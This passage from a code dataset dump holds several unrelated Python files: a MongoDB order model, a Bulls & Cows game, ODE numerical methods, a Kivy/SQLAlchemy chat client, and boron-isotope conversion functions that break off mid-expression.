tar_col[meal[\"category\"]].find_one(\n {\"_id\": meal[\"id\"]}, {\"name\": 1}\n )\n meal[\"name\"] = tar[\"name\"]\n\n result = db.ORDER_COLLECTION.insert_one(\n {\n \"userName\": data[\"userName\"],\n \"notes\": data[\"notes\"],\n \"total\": data[\"total\"],\n \"content\": data[\"content\"],\n \"state\": \"unknown\",\n \"createdAt\": datetime.now(),\n \"takenAt\": taken_at,\n \"orderID\": str(MAX_ORDERID),\n }\n )\n\n pipeline = [{\"$match\": {\"_id\": result.inserted_id}}] + UNKNOWN_PROJECT\n return list(db.ORDER_COLLECTION.aggregate(pipeline))[0]\n else:\n return None\n\n\ndef update_state(data):\n state = [\"doing\", \"cancel\", \"finish\", \"end\"]\n if data[\"state\"] in state:\n db.ORDER_COLLECTION.update_one(\n {\"_id\": ObjectId(data[\"id\"])}, {\"$set\": {\"state\": data[\"state\"]}}\n )\n result = db.ORDER_COLLECTION.find_one(\n {\"_id\": ObjectId(data[\"id\"])},\n {\"userName\": 1, \"_id\": 1, \"orderID\": 1, \"state\": 1},\n )\n if result:\n result[\"_id\"] = str(result[\"_id\"])\n return result\n else:\n return None\n else:\n return None\n\n\ndef get_todo_order(id=None):\n if id:\n match = {\n \"$match\": {\n \"state\": {\"$in\": [\"doing\", \"finish\"]},\n \"_id\": ObjectId(id),\n }\n }\n else:\n match = {\"$match\": {\"state\": {\"$in\": [\"doing\", \"finish\"]}}}\n\n result = db.ORDER_COLLECTION.aggregate(\n [\n match,\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"localField\": \"userName\",\n \"foreignField\": \"userName\",\n \"as\": \"user\",\n }\n },\n {\"$unwind\": {\"path\": \"$user\"}},\n {\"$project\": {\"content.id\": 0, \"content.category\": 0}},\n {\n \"$project\": {\n \"_id\": {\"$toString\": \"$_id\"},\n \"orderID\": {\"$toInt\": \"$orderID\"},\n \"takenAt\": {\n \"$dateToString\": {\n \"format\": \"%Y/%m/%d %H:%M\",\n \"date\": \"$takenAt\",\n }\n },\n \"state\": 1,\n \"content\": 1,\n \"notes\": 1,\n \"user_id\": {\"$toString\": \"$user._id\"},\n \"phone\": \"$user.phone\",\n }\n },\n {\"$sort\": {\"orderID\": 1}},\n ]\n )\n return result\n\n\ndef get_unknown_order():\n pipeline = (\n [{\"$match\": {\"state\": \"unknown\"}}]\n + UNKNOWN_PROJECT\n + [{\"$sort\": {\"orderID\": 1}}]\n )\n result = db.ORDER_COLLECTION.aggregate(pipeline)\n return result\n\n\ndef update_food_amount(data):\n result = db.ORDER_COLLECTION.find_one(\n {\"_id\": ObjectId(data[\"id\"])}, {\"content\": 1, \"_id\": 0}\n )\n for meal in result[\"content\"]:\n if meal[\"category\"] == \"item\":\n db.ITEM_COLLECTION.update_one(\n {\"name\": meal[\"name\"]}, {\"$inc\": {\"sell\": meal[\"quantity\"]}}\n )\n if meal[\"category\"] == \"combo\":\n db.COMBO_COLLECTION.update_one(\n {\"name\": meal[\"name\"]}, {\"$inc\": {\"sell\": meal[\"quantity\"]}}\n )\n","repo_name":"creek0810/loveat2","sub_path":"models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26639772971","text":"\"\"\"Bull&Cows game.\"\"\"\nimport sys\nimport random\n\nPUZZLE_LENGTH = 4\n\n\ndef make_puzzle():\n \"\"\"Return random string from 4 different digits.\"\"\"\n puzzle = []\n while len(puzzle) < PUZZLE_LENGTH:\n digit = str(random.choice(range(10)))\n if digit not in puzzle: # pragma: no cover\n puzzle.append(digit)\n\n return ''.join(puzzle)\n\n\ndef is_unique_chars(text):\n \"\"\"Return True, if text consist from unique chars.\"\"\"\n for i in range(len(text) - 1):\n if text[i] in text[i + 1:]:\n return False\n\n return True\n\n\ndef is_valid(text):\n \"\"\"Return True, if user input follow formal criteria.\"\"\"\n if len(text) != PUZZLE_LENGTH:\n return False\n\n try:\n int(text)\n except ValueError:\n return False\n\n if not is_unique_chars(text):\n return False\n\n return True\n\n\nclass BullCows:\n \"\"\"Bull&Cows quest.\"\"\"\n\n def __init__(self, puzzle=None):\n \"\"\"Can use predefined puzzle.\"\"\"\n self.try_count = 0\n self.puzzle = puzzle\n if self.puzzle is None:\n self.puzzle = make_puzzle()\n\n def check(self, answer):\n \"\"\"Check answer string for cows and bulls.\"\"\"\n if not is_valid(answer):\n return (None, None)\n\n self.try_count += 1\n position, cows, bulls = 0, 0, 0\n for digit in answer:\n if digit in self.puzzle:\n if position == self.puzzle.index(digit):\n bulls += 1\n else:\n cows += 1\n\n position += 1\n\n return (cows, bulls)\n\n\ndef get_input(prompt): # pragma: no cover\n \"\"\"Return user input.\"\"\"\n return input(prompt)\n\n\ndef main(argv, puzzle=None):\n \"\"\"Standalone app.\"\"\"\n quest = BullCows(puzzle=puzzle)\n cows, bulls = None, None\n if (len(argv) > 1) and (argv[1] == 'imcheater'):\n print(\"my puzzle:\", quest.puzzle)\n\n while bulls != PUZZLE_LENGTH:\n cows, bulls = quest.check(get_input('enter 4 digits:'))\n if cows is None:\n print('need {} different digits!'.format(PUZZLE_LENGTH))\n else:\n print('cows:', cows, 'bulls:', bulls)\n\n print('Done!')\n print('Quest solved with {} tries'.format(quest.try_count))\n\n\nif __name__ == \"__main__\": # pragma: no cover\n main(sys.argv)\n","repo_name":"vb64/bulls_cows","sub_path":"source/default/bull_cows.py","file_name":"bull_cows.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23892992547","text":"def func(x, u):\r\n return x ** 2 + u ** 2\r\n\r\ndef euler(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * func(x, y)\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef un_euler(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * (func(x, y) + func(x+h, y + h * func(x, y)))/2\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef runge_kutta_2(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * func(x+h/2, y+h/2*func(x,y))\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef picar(n, h, x):\r\n # Производные для метода Пикара\r\n def f1(a):\r\n return a ** 3 / 3\r\n def f2(a):\r\n return f1(a) + a ** 7 / 63\r\n def f3(a):\r\n return f2(a) + a ** 14 * 2 / 2079 + a ** 15 / 59535\r\n\r\n\r\n y_out = [0]\r\n for i in range(n-1):\r\n x += h\r\n y_out.append(f3(x))\r\n return y_out\r\n \r\n\r\npower = 3\r\nn = 3 * 10 ** power\r\nh = 10 ** -power\r\nx = 0\r\ny0 = 0\r\nx_arr = [x + h*i for i in range(n)]\r\ny1 = euler(n, h, x, y0)\r\ny2 = un_euler(n, h, x, y0)\r\ny3 = runge_kutta_2(n, h, x, y0)\r\ny4 = picar(n, h, x)\r\n\r\nprint(\"| x | Пикара | Явный Эйлера | Неявный Эйлера | Рунге-Кутты 2го порядка|\")\r\nprint(\"-\"*85)\r\nfor i in range(len(y1)):\r\n print(\"|{:.4f} | {:.8f} | {:.8f} | {:.8f} | {:.8f} |\".format(x_arr[i],y4[i],y1[i],y2[i],y3[i]))\r\nprint(\"-\"*76)\r\n\r\n\r\n# сходимость проверяется при фиксированном x \r\n","repo_name":"Ermako27/numerical-methods","sub_path":"sem6/lab1/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10480165661","text":"# Imports\nfrom network import Network\nimport datetime\n\n# Kivy\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import Screen, ScreenManager, NoTransition\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.spinner import Spinner, SpinnerOption\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.uix.popup import Popup\n\n# SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import declarative_base\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///database.db', echo=False)\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass Conversations(Base):\n __tablename__ = 'conversations'\n id = Column(Integer, primary_key=True)\n enduser = Column(String)\n user = Column(String)\n ms = Column(String)\n sendreceive = Column(Boolean)\n time = Column(DateTime)\n\n\nclass Contacts(Base):\n __tablename__ = 'contacts'\n id = Column(Integer, primary_key=True)\n user = Column(String)\n\n\nBase.metadata.create_all(engine)\n\n\nclass MyTextInput(TextInput):\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos) and self.text != \"\" and not self.disabled:\n self.text = \"\"\n return super(MyTextInput, self).on_touch_down(touch)\n\n\nclass SpinnerOptions(SpinnerOption):\n def __init__(self, **kwargs):\n super(SpinnerOptions, self).__init__(**kwargs)\n self.height = button_size\n\n\nclass SpinnerWidget(Spinner):\n def __init__(self, **kwargs):\n super(SpinnerWidget, self).__init__(**kwargs)\n self.option_cls = SpinnerOptions\n\n\ndef update_chat(instance):\n s1 = screen_manager.get_screen(\"conversation\")\n data = network.send(user=False, data=False)\n if data != \"no data\":\n for value, row in data.items():\n data = \"\".join(row)\n save_message(str(value), network.id, data, False)\n\n if screen_manager.current == \"conversation\":\n if s1.contact_user_id == value:\n s1.add_new_row(client_message=False, data=data)\n\n # new messages counter\n if not (screen_manager.current == \"conversation\" and s1.contact_user_id == value):\n s2 = screen_manager.get_screen(\"contacts\")\n updated = False\n for record in s2.button_list:\n if value == record[0].text:\n updated = True\n record[2].text = str(int(record[2].text) + 1)\n\n # adding new contact if it's not in contact list\n if not updated:\n s2.add_new_contact(text=value)\n\n\ndef save_message(end_user, user, message, flag):\n new_record = Conversations(enduser=end_user,\n user=user,\n ms=message,\n sendreceive=flag,\n time=datetime.datetime.now())\n session.add(new_record)\n session.commit()\n\n\nclass MainScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n\n try:\n with open(\"config.txt\", \"r\") as file:\n user_id = file.read().split(\":\")[1]\n except FileNotFoundError:\n user_id = \"*not set*.\"\n\n self.user_id = MyTextInput(text=f\"Your nickname: {user_id}\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n height=button_size,\n disabled=True,\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]})\n\n self.float_layout.add_widget(self.user_id)\n\n self.btn_contacts = Button(text=\"Contacts\",\n pos_hint={\"x\": 0.2, \"y\": 0.5},\n size_hint=(0.6, 0.1),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_contacts)\n\n self.btn_settings = Button(text=\"Settings\",\n pos_hint={\"x\": 0.2, \"y\": 0.3},\n size_hint=(0.6, 0.1),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_settings)\n\n self.add_widget(self.float_layout)\n\n def go_to(self, instance):\n if instance == self.btn_settings:\n screen_manager.current = \"settings\"\n elif instance == self.btn_contacts:\n if self.user_id.text != \"Your nickname: *not set*.\" and network.status != \"connected\":\n screen_manager.current = \"contacts\"\n network.id = self.user_id.text.split(\":\")[1].strip()\n network.user_created_status = network.connect()\n Clock.schedule_interval(update_chat, 1)\n\n elif network.status == \"connected\":\n screen_manager.current = \"contacts\"\n\n else:\n btn_close = BoxLayout(orientation=\"horizontal\")\n popup_warning = Popup(title='Please provide correct User ID',\n content=btn_close,\n size_hint=(None, None),\n size=(Window.width, Window.height / 8))\n btn_close.add_widget(Button(text=\"close\", on_press=popup_warning.dismiss))\n popup_warning.open()\n\n\nclass ConversationScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n Window.bind(on_key_down=self._on_keyboard_down)\n\n self.float_layout = FloatLayout()\n self.body_row_data = []\n self.contact_user_id = \"N/A\"\n self.user_id_con = MyTextInput(text=\"User ID\",\n halign=\"center\",\n size_hint_x=None,\n width=6*Window.size[0]/10,\n disabled=True,\n size_hint_y=None,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]})\n self.float_layout.add_widget(self.user_id_con)\n\n self.btn_contacts = Button(text=\"Contacts\",\n pos_hint={\"x\": 0.6, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.25, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_contacts)\n\n self.btn_menu = Button(text=\"Menu\",\n pos_hint={\"x\": 0.85, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.15, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_menu)\n\n self.layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n self.layout.bind(minimum_height=self.layout.setter('height'))\n\n self.root = ScrollView(size_hint=(1, None),\n size=(Window.width, Window.height - 3 * button_size - 20),\n pos_hint={\"x\": 0, \"y\": (2 * button_size + 10)/Window.size[1]})\n\n self.root.add_widget(self.layout)\n self.float_layout.add_widget(self.root)\n\n self.data_input = MyTextInput(text=\"Type your message here...\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n multiline=False,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": button_size/Window.size[1]})\n self.float_layout.add_widget(self.data_input)\n\n self.btn_send = Button(text=\"Send!\",\n pos_hint={\"x\": 0, \"y\": 0},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.send_data_to_server)\n self.float_layout.add_widget(self.btn_send)\n\n self.add_widget(self.float_layout)\n\n def _on_keyboard_down(self, instance, keyboard, keycode, text, modifiers):\n if self.data_input.focus and keycode == 40:\n self.send_data_to_server()\n\n def send_data_to_server(self, instance=None):\n data_to_send = self.data_input.text\n if data_to_send and data_to_send != \"Type your message here...\":\n receiver_id = self.contact_user_id\n data = network.send(user=receiver_id, data=data_to_send)\n\n if data != \"no data\":\n for sender_id, row in data.items():\n data = \"\".join(row)\n save_message(str(sender_id), network.id, data, False)\n if self.contact_user_id == sender_id:\n self.add_new_row(client_message=False, data=data)\n\n self.add_new_row(client_message=True, data=data_to_send)\n save_message(receiver_id, network.id, data_to_send, True)\n self.data_input.text = \"Type your message here...\"\n\n def add_new_row(self, client_message=True, data=None, time=None):\n if not time:\n time = str(datetime.datetime.now()).split(\".\")[0]\n message_data = f\"{time}\\n{data}\"\n\n # TODO: Issue with fixed label's size needs to be resolved.\n if not client_message:\n message_data = Label(text=message_data,\n halign=\"left\",\n size_hint_x=None,\n size_hint_y=None,\n height=2*button_size,\n width=Window.size[0],\n text_size=(Window.size[0], None))\n\n self.layout.add_widget(message_data)\n\n else:\n message_data = Label(text=message_data,\n halign=\"right\",\n size_hint_x=None,\n size_hint_y=None,\n height=2*button_size,\n width=Window.size[0],\n text_size=(Window.size[0], None))\n self.layout.add_widget(message_data)\n\n self.root.scroll_to(message_data)\n\n self.body_row_data.append([message_data])\n\n def go_to(self, instance):\n if instance == self.btn_contacts:\n screen_manager.current = \"contacts\"\n elif instance == self.btn_menu:\n screen_manager.current = \"main\"\n\n def load_conversation(self):\n for row in self.body_row_data.copy():\n for widget in row:\n self.layout.remove_widget(widget)\n self.body_row_data.remove(row)\n for row in session.query(Conversations).\\\n filter(Conversations.user == network.id, Conversations.enduser == self.contact_user_id). \\\n all():\n self.add_new_row(client_message=row.sendreceive, data=row.ms, time=str(row.time).split(\".\")[0])\n\n\nclass ContactsScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n self.update = None\n self.button_list = []\n\n self.btn_menu = Button(text=\"Menu\",\n pos_hint={\"x\": 0.8, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.2, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_menu)\n\n popup_content = BoxLayout(orientation=\"vertical\")\n label_box_1 = Label(text='User nickname')\n self.text_box_1 = MyTextInput(text='')\n popup_content.add_widget(label_box_1)\n popup_content.add_widget(self.text_box_1)\n self.popup_submit_button = Button(text=\"Submit\", on_press=self.add_new_contact)\n popup_content.add_widget(self.popup_submit_button)\n\n self.popup_new_contact = Popup(title='Add new contact',\n content=popup_content,\n size_hint=(None, None),\n size=(Window.width/1.5, Window.height/3))\n\n self.btn_add_new_contact = Button(text=\"Add new contact\",\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.8, button_size/Window.size[1]),\n on_press=self.popup_new_contact.open)\n self.float_layout.add_widget(self.btn_add_new_contact)\n\n self.layout = GridLayout(cols=3, spacing=10, size_hint_y=None)\n self.layout.bind(minimum_height=self.layout.setter('height'))\n\n self.root = ScrollView(size_hint=(1, None),\n size=(Window.width, Window.height - button_size - 10),\n pos_hint={\"x\": 0, \"y\": 0})\n\n self.root.add_widget(self.layout)\n self.float_layout.add_widget(self.root)\n self.add_widget(self.float_layout)\n self.load_contacts()\n\n def go_to(self, instance):\n if instance == self.btn_menu:\n screen_manager.current = \"main\"\n\n def load_contacts(self):\n for record in session.query(Contacts).all():\n self.display_contact(text=record.user)\n\n def display_contact(self, text, number=\"0\"):\n contact_button = Button(text=text,\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=2 * Window.size[0] / 4 - 5,\n on_press=self.open_conversation)\n self.layout.add_widget(contact_button)\n\n count_message = Button(text=number,\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=Window.size[0] / 4 - 5)\n self.layout.add_widget(count_message)\n\n contact_delete_button = Button(text=\"X\",\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=Window.size[0] / 4 - 5,\n on_press=self.delete_conversation)\n self.layout.add_widget(contact_delete_button)\n self.button_list.append([contact_button, contact_delete_button, count_message])\n\n def add_new_contact(self, instance=None, text=None):\n\n if instance == self.popup_submit_button:\n text = self.text_box_1.text\n number = \"0\"\n else:\n number = \"1\"\n\n if not session.query(Contacts).filter(Contacts.user == text).all():\n new_contact = Contacts(user=text)\n session.add(new_contact)\n session.commit()\n self.text_box_1.text = \"\"\n self.popup_new_contact.dismiss()\n self.display_contact(text=text, number=number)\n\n def open_conversation(self, instance):\n screen_manager.current = \"conversation\"\n s1 = screen_manager.get_screen(\"conversation\")\n s1.user_id_con.text = f\"Chat with user: {instance.text}\"\n s1.contact_user_id = instance.text\n s1.load_conversation()\n\n # clear unread messages\n for record in self.button_list:\n if instance == record[0]:\n record[2].text = \"0\"\n\n def delete_conversation(self, instance):\n for button in self.button_list:\n if instance == button[1]:\n session.query(Conversations).\\\n filter(Conversations.user == network.id,\n Conversations.enduser == button[0].text).delete(synchronize_session=False)\n session.commit()\n\n session.query(Contacts).filter(Contacts.user == button[0].text).delete(synchronize_session=False)\n session.commit()\n\n self.layout.remove_widget(button[0])\n self.layout.remove_widget(button[1])\n self.layout.remove_widget(button[2])\n self.button_list.remove(button)\n\n\nclass SettingsScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n\n self.go_back_to_menu = Button(text=\"Go back to menu\",\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.go_back_to_menu)\n\n self.user_id = MyTextInput(text=\"User ID\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": 0.5 - button_size / Window.size[1]})\n self.float_layout.add_widget(self.user_id)\n\n self.save_user_id = Button(text=\"Save\",\n pos_hint={\"x\": 0, \"y\": 0.5 - 2*button_size/Window.size[1]},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.save_id)\n self.float_layout.add_widget(self.save_user_id)\n\n self.add_widget(self.float_layout)\n\n def go_to(self, instance):\n if instance == self.go_back_to_menu:\n screen_manager.current = \"main\"\n\n def save_id(self, instance):\n with open(\"config.txt\", \"w\") as file:\n file.write(f\"user_id:{self.user_id.text}\")\n\n s1 = screen_manager.get_screen(\"main\")\n s1.user_id.text = f\"Your nickname: {self.user_id.text}\"\n screen_manager.current = \"main\"\n self.user_id.disabled = True\n\n\nclass MyApp(App):\n def build(self):\n self.title = \"TextComSoc\"\n return screen_manager\n\n\nif __name__ == '__main__':\n Window.softinput_mode = \"below_target\"\n Window.size = (300, 700)\n button_size = Window.size[1] / 20\n network = Network()\n\n screen_manager = ScreenManager(transition=NoTransition())\n screen_manager.add_widget(MainScreen(name=\"main\"))\n screen_manager.add_widget(ConversationScreen(name=\"conversation\"))\n screen_manager.add_widget(SettingsScreen(name=\"settings\"))\n screen_manager.add_widget(ContactsScreen(name=\"contacts\"))\n\n MyApp().run()\n","repo_name":"bdrab/TextCommunicator-Socket","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":19298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22009804251","text":"# B isotope fns\n\nimport numpy as np\nfrom cbsyst.helpers import NnotNone, Bunch\nfrom .boron import chiB_calc\n\ndef get_alphaB():\n \"\"\"\n Klochko alpha for B fractionation\n \"\"\"\n return 1.0272\n\ndef get_epsilonB():\n \"\"\"\n Klochko epsilon for B fractionation\n \"\"\"\n return alpha_to_epsilon(get_alphaB())\n\ndef alpha_to_epsilon(alphaB):\n \"\"\"\n Convert alpha to epsilon (which is alpha in delta space)\n\n Parameters\n ----------\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n alphaB expressed in delta notation (AKA epsilonB).\n \"\"\"\n return (alphaB-1)*1000\n\ndef epsilon_to_alpha(epsilonB):\n \"\"\"\n Convert epsilon to alpha\n\n Parameters\n ----------\n epsilonB : array-like\n The isotope fractionation factor (11/10 BO3)/(11/10 BO4) expressed in delta notation.\n\n Returns\n -------\n array-like\n The isotope fractionation factor (11/10 BO3)/(11/10 BO4).\n \"\"\"\n return (epsilonB/1000)+1\n\n\n# Isotope Unit Converters\ndef A11_to_d11(A11, SRM_ratio=4.04367):\n \"\"\"\n Convert fractional abundance (A11) to delta notation (d11).\n\n Parameters\n ----------\n A11 : array-like\n The fractional abundance of 11B: 11B / (11B + 10B).\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n A11 expressed in delta notation (d11).\n \"\"\"\n return ((A11 / (1 - A11)) / SRM_ratio - 1) * 1000\n\ndef A11_to_R11(A11):\n \"\"\"\n Convert fractional abundance (A11) to isotope ratio (R11).\n\n Parameters\n ----------\n A11 : array-like\n The fractional abundance of 11B: 11B / (11B + 10B).\n\n Returns\n -------\n array-like\n A11 expressed as an isotope ratio (R11).\n \"\"\"\n return A11 / (1 - A11)\n\ndef d11_to_A11(d11, SRM_ratio=4.04367):\n \"\"\"\n Convert delta notation (d11) to fractional abundance (A11).\n\n Parameters\n ----------\n d11 : array-like\n The isotope ratio expressed in delta notation.\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n Delta notation (d11) expressed as fractional abundance (A11).\n \"\"\"\n return SRM_ratio * (d11 / 1000 + 1) / (SRM_ratio * (d11 / 1000 + 1) + 1)\n\ndef d11_to_R11(d11, SRM_ratio=4.04367):\n \"\"\"\n Convert delta notation (d11) to isotope ratio (R11).\n\n Parameters\n ----------\n d11 : array-like\n The isotope ratio expressed in delta notation.\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n Delta notation (d11) expressed as isotope ratio (R11).\n \"\"\"\n return (d11 / 1000 + 1) * SRM_ratio\n\ndef R11_to_d11(R11, SRM_ratio=4.04367):\n \"\"\"\n Convert isotope ratio (R11) to delta notation (d11).\n\n Parameters\n ----------\n R11 : array-like\n The isotope ratio (11B/10B).\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n R11 expressed in delta notation (d11).\n \"\"\"\n return (R11 / SRM_ratio - 1) * 1000\n\ndef R11_to_A11(R11):\n \"\"\"\n Convert isotope ratio (R11) to fractional abundance (A11).\n\n Parameters\n ----------\n R11 : array-like\n The isotope ratio (11B/10B).\n\n Returns\n -------\n array-like\n R11 expressed as fractional abundance (A11).\n \"\"\"\n return R11 / (1 + R11)\n\n# Alpha Converters\ndef ABO3_to_ABO4(ABO3,alphaB):\n \"\"\"\n Converts isotope fractional abundance of boric acid to isotope fraction abundance of borate ion\n\n Parameters\n ----------\n ABO3 : array-like\n The fractional abundance of boric acid (B(OH)3)\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n ABO4 - the fractional abundance of borate ion (B(OH)4)\n \"\"\"\n return (1 / ((alphaB / ABO3) - alphaB + 1) )\n\ndef ABO3_or_ABO4(ABO3,ABO4,alphaB):\n \"\"\"\n Helper function to determine ABO4 if ABO3 is None\n\n Parameters\n ----------\n ABO3 : array-like\n The fractional abundance of boric acid (B(OH)3)\n ABO4 : array-like\n The fractional abundance of borate ion (B(OH)4)\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n ABO4 - the fractional abundance of borate ion (B(OH)4)\n \"\"\"\n if NnotNone(ABO3, ABO4) < 1:\n raise(ValueError(\"Either ABO4 or ABO3 must be specified\"))\n elif ABO4 is None:\n ABO4 = ABO3_to_ABO4(ABO3,alphaB)\n return ABO4\n\n\n# Base Functions\n# Calculate total boron isotope fractional abundance using borate ion (B(OH)4)\ndef calculate_ABT(H, Ks, alphaB, ABO4=None, ABO3=None):\n \"\"\"\n Calculate ABT from pH (total scale) and ABO4 or ABO3.\n\n Parameters\n ---------- \n Ks : dict\n A dictionary of stoichiometric equilibrium constants.\n pH : array-like\n pH on the Total scale\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n ABO4 : array-like\n The fractional abundance of 11B in B(OH)4.\n ABO3 : array-like\n The fractional abundance of 11B in B(OH)3.\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in total B (ABT).\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n\n chiB = chiB_calc(H, Ks)\n return (\n ABO4\n * (\n -ABO4 * alphaB * chiB\n + ABO4 * alphaB\n + ABO4 * chiB\n - ABO4\n + alphaB * chiB\n - chiB\n + 1\n )\n / (ABO4 * alphaB - ABO4 + 1))\n\n# Calculate pH using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_H(Ks, alphaB, ABT, ABO4=None, ABO3=None):\n \"\"\"\n Calculate H from ABO4 or ABO3 and ABT. \n\n Parameters\n ----------\n Ks : dict\n dictionary of speciation constants\n alphaB : float or array-like\n fractionation factor between B(OH)3 and B(OH)4-\n ABT : float or array-like\n fractional abundance of 11B in total B\n ABO4 : float or array-like\n fractional abundance of 11B in B(OH)4-\n \n Returns\n -------\n array-like\n pH on the total scale.\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n\n return (Ks.KB / ((alphaB / (1 - ABO4 + alphaB * ABO4) - 1) / (ABT / ABO4 - 1) - 1))\n\n# Calculate isotope fractional abundance of boric acid (B(OH)3)\ndef calculate_ABO3(H, Ks, ABT, alphaB):\n \"\"\"\n Calculate ABO3 from H and ABT\n\n Parameters\n ----------\n Ks : dict\n A dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in B(OH)3.\n \"\"\"\n chiB = chiB_calc(H, Ks)\n return (\n ABT * alphaB\n - ABT\n + alphaB * chiB\n - chiB\n - np.sqrt(\n ABT ** 2 * alphaB ** 2\n - 2 * ABT ** 2 * alphaB\n + ABT ** 2\n - 2 * ABT * alphaB ** 2 * chiB\n + 2 * ABT * alphaB\n + 2 * ABT * chiB\n - 2 * ABT\n + alphaB ** 2 * chiB ** 2\n - 2 * alphaB * chiB ** 2\n + 2 * alphaB * chiB\n + chiB ** 2\n - 2 * chiB\n + 1\n )\n + 1\n ) / (2 * chiB * (alphaB - 1))\n\n# Calculate isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_ABO4(H, Ks, ABT, alphaB):\n \"\"\"\n Calculate ABO4 from H and ABT\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in B(OH)4-\n \"\"\"\n chiB = chiB_calc(H, Ks)\n return -(\n ABT * alphaB\n - ABT\n - alphaB * chiB\n + chiB\n + np.sqrt(\n ABT ** 2 * alphaB ** 2\n - 2 * ABT ** 2 * alphaB\n + ABT ** 2\n - 2 * ABT * alphaB ** 2 * chiB\n + 2 * ABT * alphaB\n + 2 * ABT * chiB\n - 2 * ABT\n + alphaB ** 2 * chiB ** 2\n - 2 * alphaB * chiB ** 2\n + 2 * 